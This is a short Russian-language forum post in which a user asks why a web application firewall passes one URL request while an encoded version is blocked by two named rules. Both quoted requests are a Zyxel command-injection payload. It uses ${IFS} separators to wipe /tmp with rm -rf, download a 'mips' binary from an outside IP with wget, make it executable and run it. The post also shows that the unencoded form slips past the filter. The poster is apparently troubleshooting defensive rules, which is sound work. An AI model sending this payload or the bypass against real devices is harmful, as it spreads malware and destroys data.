untitledds
New member
Здравствуйте, waf пропускает запрос вида в url:
При этом, строка :
хотя правила есть для таких запросов./bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
При этом, строка :
блокируется правилами 2926 и 1879/bin/zhttpd/$%7BIFS%7Dcd$%7BIFS%7D/tmp;$%7BIFS%7Drm$%7BIFS%7D-rf$%7BIFS%7D*;$%7BIFS%7Dwget$%7BIFS%7Dhttp://103.110.33.164/mips;$%7BIFS%7Dchmod$%7BIFS%7D777$%7BIFS%7Dmips;$%7BIFS%7D./mips$%7BIFS%7Dzyxel.selfrep;
Last edited: